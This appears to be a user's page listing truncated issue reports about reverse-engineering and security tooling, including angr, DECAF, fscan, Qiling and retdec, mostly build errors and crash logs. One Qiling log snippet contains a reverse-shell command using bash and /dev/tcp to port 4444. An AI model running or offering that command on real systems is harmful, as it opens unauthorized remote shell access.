九层台(tower)
九层台(tower)
你好,我在运行代码的时候总是不成功,程序是我自己编译的 ``` (angr) ➜ 03_angr_symbolic_registers python -V Python 3.7.5 (angr) ➜ 03_angr_symbolic_registers pypy -V Python 2.7.13 (7.1.1+dfsg-1, Aug 09 2019, 05:11:07) [PyPy 7.1.1 with GCC 9.1.0] >>> angr.__version__ (8, 19,...
GEN i386-softmmu/config-devices.mak GEN arm-softmmu/config-devices.mak GEN mips-softmmu/config-devices.mak GEN config-all-devices.mak Building Sleuthkit, please wait... GEN Sleuthkit PREP Sleuthkit headers/libs GEN config-host.h GEN trace.h GEN qemu-options.def GEN qmp-commands.h File "/home/tower/DECAF/decaf/scripts/qapi-commands.py", line 376 except...
All point cloud loading speed is too slow, I need to load some points, how do I need to set it? Is there a parameter available? thank you
An error is reported when extracting an arm architecture kernel ``` (base) ➜ ex /home/tower/tools/vmlinux-to-elf/vmlinux-to-elf --e-machine 9 --bit-size 32 ./uImage ./vmlinux_elf [+] Kernel successfully decompressed in-memory (the offsets that follow...
mips 32位有支持吗,这里构建好了,但是在运行的时候失败了 (base) ➜ fscan git:(main) ✗ GOOS=linux GOARCH=mipsle go build -a -ldflags="-s -w" -trimpath (base) ➜ fscan git:(main) ✗ qemu-mipsel ./fscan fatal error: sigaction failed runtime stack: runtime.throw({0xb2d07b, 0x10})...
***Describe the bug** This bug be report,when run qiling? It works fine when run with qemu-user-static. ``` [+] [Thread 2000] b'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1' [+] [Thread 2000] 0x90064488: recv(sockfd...
***Describe the bug** 当我运行arm架构程序,在程序执行到system函数的时候出现了崩溃,这好像是子进程的问题,有办法解决吗 `[x] Syscall ERROR: ql_syscall_clone DEBUG: 'NoneType' object has no attribute 'cur_thread' Traceback (most recent call last): File "/home/tower/miniconda3/envs/iot/lib/python3.8/site-packages/qiling/os/posix/posix.py", line 374, in load_syscall retval = syscall_hook(self.ql, *params)...
I found that there was an error in the parsing of the library function. The reason for the error was that retdec could not parse the jump from plt to...
I got the wrong number of parameters for the llvm ir function, is there a solution? When i run `retdec-decomplier.py filename` I get the following instructions ``` %356 = call...